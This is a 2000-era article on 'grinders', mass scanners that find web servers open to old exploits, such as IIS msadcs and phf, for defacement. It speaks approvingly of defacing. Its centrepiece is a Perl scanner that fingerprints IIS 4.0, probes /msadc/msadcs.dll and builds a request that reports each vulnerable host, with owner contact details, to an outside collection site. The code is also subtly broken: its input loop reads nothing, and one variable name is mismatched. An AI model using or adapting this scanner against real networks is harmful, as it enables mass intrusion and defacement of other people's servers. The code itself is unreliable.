Grinding for Vulnerabilities

by Russ Rogers - 1/22/00

Don't you just love web page defacings? Some kid jumping on a huge corporate network and making life difficult for another overpaid System Administrator? :) Actually, it's a simple process to lock down a web server (but not a process I'm writing about here). It's also a simple process to scan a very large range of IP addresses to find vulnerable servers to exploit.

Defacers don't normally spend lots of time on one corporate server trying to get in and hack a page. They would rather scan tons of address space and generate a list of servers in that space that are vulnerable to one or another vulnerability. Some sample vulnerabilities are the latest IIS msadcs exploits and the notorious phf exploits that can pop up remote shells via a web browser.

The tool used to scan these address spaces are commonly known as "grinders." Grinders are fairly simple to write if you have some programming experience. I prefer to use Perl since it is portable and works well under most platforms. Solid networking skills are a must.

The grinder takes the IP space you provide and scans each address within that space. It also scans a specific port and a specific vulnerability. Pretty cool. Scanning for the actual exploit consists of sending commands to a port on an address and listening for the response. If the response is correct, the IP address is logged as exploitable within a text file.

Because of security reasons (grin), I'm not going to post an entire exploit here, but I want to put a sample up so you can see how it works. The first part opens a connection to a port at an IP address. Then it sends a command to the web server at the other end. The following clip shows the heart of the software.

open(INP, $ARGV[0]);
while() {
chomp;

print "Checking $_...";
$ua = LWP::UserAgent->new;
$request = HTTP::Request->new(get => "http://$_/");
$reply = $ua->request($request);
$ua->product("MSADC Scanner 1.0; http://www.irc-servers.com;");

if (!($reply->server)) {
print "No Webserver Running\n";
next;
}

if ($reply->server =~ "Microsoft-IIS/4.0") {
$request = HTTP::Request->new(GET => "http://$_/msadc/msadcs.dll");
$reply = $ua->request($request);

if ($reply->content =~ /application\/x-varg/) {
print "Vulnerable\n";

$_ = /(.+)\.(.+)\.(.+)/;
($lname, $fname, $email) = get_contacts("$2.$3.");

$ui = new LWP::UserAgent->new;
$irqst = HTTP::Request->new(GET => "http://msadc.irc-servers.com/add.php3?host=$_&lname=$last&first=$fname&email=$email\n");
}
} else {
print "Not Vulnerable\n";
}

Now before anyone has a cow, I didn't write this particular code. It was given to me by Rackmount. You can find a listing of his conquests at attrition.org.